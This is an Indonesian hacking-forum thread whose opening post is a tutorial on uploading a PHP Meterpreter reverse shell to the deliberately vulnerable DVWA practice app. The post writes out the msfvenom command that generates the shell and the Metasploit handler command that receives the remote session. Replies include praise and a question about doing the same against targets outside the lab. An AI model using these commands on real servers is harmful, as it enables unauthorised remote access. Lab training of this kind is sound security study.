Rooting Web Server Kali LInux Menggunakan Metasploit
#1
Selamat Melaksanakan Ibadah puasa bagi teman-teman pencinta IT indonesia dan sahabat-sahabat saya di
indonesian backtrack team,codernate,dan IT-Manado/Indifinetech.....!!!
Penulis kali ini akan memberikan sedikit ilmu rooting webserver kali linux dengan memanfaatkan metasploit
untuk membuat shell php,disini penulis sengaja menggunkan web yang sudah vulnerability DVWA (Damn
Vulnerable Web Application) dan web application ini bisa didownload di http://www.dvwa.co.uk/
Kita buat dulu php sheelnya
LHOST= IP komputer anda
Lport= port target
Desktop/premankali.php = sheelnya bernama premankali.php terletak di Desktop.
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.114.177.215 LPORT=81 -f raw >
Desktop/premankali.php
Edit premankali.php dengan text editor kesayangan anda disini penulis menggunakan leafpad lebih ringan dan
cepat,penulis juga sudah mencoba menggunakan gedit tapi responnya lama banget...so gedit is't recommended.
Tambahkan tag pembuka dan penutup php di awal script dan akhir script
?>
karena default saat kita membuat php sheel tidak terdapat tag pembuka dan penutupnya.
Jalankan localhosnya ->Application-->Kali Linux-->System Service-->HTTP-->apache2 start
mysql Application-->Kali Linux-->System Service-->HTTP-->Mysql start
Buka Web Application DVWA di browser 127.0.0.1/dvwa
Username = admin
Password = password
Setup create database
upload premankali.php

premankali.php masuk ke dir dvwa/hackable/uploads
[Image: kali2.2.3.png]

Sekarang kita komunikasikan premankali.php dengan metasploit
msfcli exploit/multi/handler LHOST=10.114.177.215 LPORT=81 PAYLOAD=php/meterpreter_reverse_tcp E
ketika premankali.php dieksekusi target maka dengan otomatis membuka meterpreter
[Image: kali3.png]
The Wolf

#2
Nice Post mas bro..
keep smile Big Grin
Quote:~ Tan Hana Wighna Tan Sirna ~

#3
nice tutor bro
izin cicipi dulu ilmunya Big Grin
Calon manusia sukses tidak akan pernah mengeluh, tapi akan sibuk memperbaiki diri dari semua kesalahan yang pernah dibuatnya
My Facebook
My Twitter

#4
hehe copas yah om? tolong dirapi in Big Grin

Big Grin tuh kan rootingnya memanfaatkan dvwa yang memang vulnerable. kalo tanpa dvwa gmn om?

#5
Bisa dikasih Sourcenya dari mana ga om Smile kalo itu memang copas dari situs lain
Every Second, Every Minutes, Every Hours, Every Days Its Never End

#6
(07-28-2013, 11:13 AM)ekawithoutyou Wrote: Bisa dikasih Sourcenya dari mana ga om Smile kalo itu memang copas dari situs lain

copas dr pdf om makanya dikit berantakan. Big Grin. pdfnya om makassarhacker sndiri kok Big Grin

#7
Buat cari celah di win 8 , or cari bug nya bisa enggak ya Big Grin
<<Hacker : 1995 << My Inspiration | yak yak yak

#8
Nyimax dulu dah ane...
izin gelar tiger





Users browsing this thread: 1 Guest(s)